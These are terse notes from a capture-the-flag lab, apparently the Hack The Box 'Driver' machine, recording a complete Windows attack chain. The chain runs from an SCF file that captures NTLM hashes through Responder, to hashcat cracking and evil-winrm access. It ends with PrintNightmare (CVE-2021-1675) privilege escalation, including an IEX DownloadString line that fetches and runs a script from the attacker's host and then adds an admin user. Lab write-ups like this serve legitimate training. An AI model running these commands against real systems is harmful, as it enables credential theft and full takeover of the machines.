//Based on Mayank Mani
/etc/passswd driver.htb
http://10.10.11.106
//MFP Firmware Update Center default creds
http://10.10.11.106/fw_up.php
//google: smb file upload driver vulnerability
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

vim @pentestlab.scf
	[Shell]
	Command=2
	IconFile=\\10.10.14.41\share\pentestlab.ico
	[Taskbar]
	Command=ToggleDesktop

responder -wrf --lm -v -I tun0
tony::DRIVER:2caad4a2ab675579:50E5F87C...........B3A65B7:010100000000000022......
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
evil-winrm -i 10.10.11.106 -u tony -p <pass>	//got user

Get-Service -Name Spooler
https://github.com/calebstewart/CVE-2021-1675
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.41:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "Carlos" -NewPassword "Carlos123"
evil-winrm -i 10.10.11.106 -u Carlos -p Carlos123		//got admin

